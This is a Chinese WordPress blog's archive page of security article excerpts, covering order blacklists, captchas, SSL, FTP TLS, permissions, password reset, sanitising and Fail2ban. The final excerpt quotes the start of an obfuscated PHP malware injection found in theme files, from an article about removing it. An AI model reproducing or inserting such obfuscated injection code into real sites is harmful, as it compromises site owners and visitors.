WordPress安全归档 _WordPress智库

WooCommerce禁止来自黑名单电子邮件地址下单

WP 技术总结

WordPress安全订单管理购物车 2024-09-18

有时候为了防止欺诈者、违反网站使用政策的用户或某些风险比较高的用户在WooCommerce网站上下单，我们需要用户提交的订单信息组者某些用户下单。得益于WooCommerce灵活的Hook，我们可以很轻松地实现这个需求。在下面的代码中，我们自定…

继续阅读

如何在 WordPress 评论中添加自定义验证码字段

WordPress安全自定义字段评论 2024-08-29

WordPress 评论一直是垃圾信息的重灾区，只要您的网站有一定的流量，并且评论功能是打开的，那么你一定受到过WordPress垃圾评论信息的困扰，有一些插件可以为WordPress评论添加验证码字段来阻止垃圾信息。但是为了这一个功能添加插件有…

继续阅读

Black Android Smartphone on Top of White Book

使用acme.sh申请Let’s Encrypt SSL证书并自动上传到阿里云CDN

网站管理运营

WordPress安全安全性能优化 2024-04-18

由于上游SSL证书服务商政策的改变，阿里云CDN已经不再支持申请免费SSL证书了，有Let’s Encrypt这样方便好用的证书服务可以使用，我们没理由购买付费的SSL，只需要稍微在服务器上设置一下，就可以让acme.sh 帮我们申请 Let’s…

继续阅读

为 Pure-FTPd 启用 TLS 支持保证 FTP 安全

网站管理运营

WordPress安全服务器 2019-07-22

大多数 WordPress 共享虚拟主机都支持 FTP，可以让我们通过 FTP 上传管理 WordPress 站点。我们知道，FTP 协议是一个非加密的协议，通过 FTP 发送的数据都赤裸裸的以明文的方式在网络上传来传去，包括 FTP 的用户名和密码，这很不安全。…

继续阅读

WordPress 服务器目录(文件夹)权限设置方法

网站管理运营

WordPress安全服务器 2019-07-09

WordPress 一般运行在 Linux 服务器上，而 Linux 服务器对各个目录有着完善、详尽的权限控制，如果权限设置不好，就会导致我们的 WordPress 站点运行有问题，其中最常见的是就是无法上传文件、无法更新主题插件、无法通过WordPress后台…

继续阅读

WordPress 后台密码忘记后，重置找回密码的 N 种方法

网站管理运营

WordPress安全 2019-06-14

忘记密码是每个人都会遇到的事情，长时间不登录 WordPress 站点后，作为管理员的你，是不是也时常会把 WordPress 管理员的密码忘掉呢？没关系，我们可以通过多种方法来找回、重置 WordPress 的用户密码。1、通过其他管理员修改密码如果…

继续阅读

在 WordPress开发过程中验证(Validating)净化(Sanitizing)和转义(Escaping)用户数据

主题开发分享

WordPress安全 WordPress数据库数据库 2019-05-20

「永远不要相信用户提供的数据」是程序开发的一条黄金原则，一个安全的WordPress主题或插件，或者其他 Web 程序，需要至少做到以下3 点，才能基本保证使用用户数据流程的安全性。在处理用户输入之前，我们需要验证用户提供的数据，以保…

继续阅读

使用 Fail2ban 防止 SSH 和 WordPress 暴力破解攻击

后台开发使用

WordPress安全安全 2017-01-28

通过 SSH 连接到服务器非常安全，但是 SSH 守护进程本身必须暴露给互联网才能正常工作。这很容易成功潜在攻击者的目标。以这种方式暴露给网络的任何服务都是攻击者的潜在目标。如果我们注意过这些服务的日志，就会经常看到重复的登录尝…

继续阅读

可恶的if(!isset($GLOBALS[“\x61\156\x75\156\x61”]))恶意代码及清除办法

WP 技术总结

WordPress安全安全 2015-06-02

在一次修改WordPress主题的时候，很意外的发现每个主题文件的头部都有一段这样的代码：if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); .…

继续阅读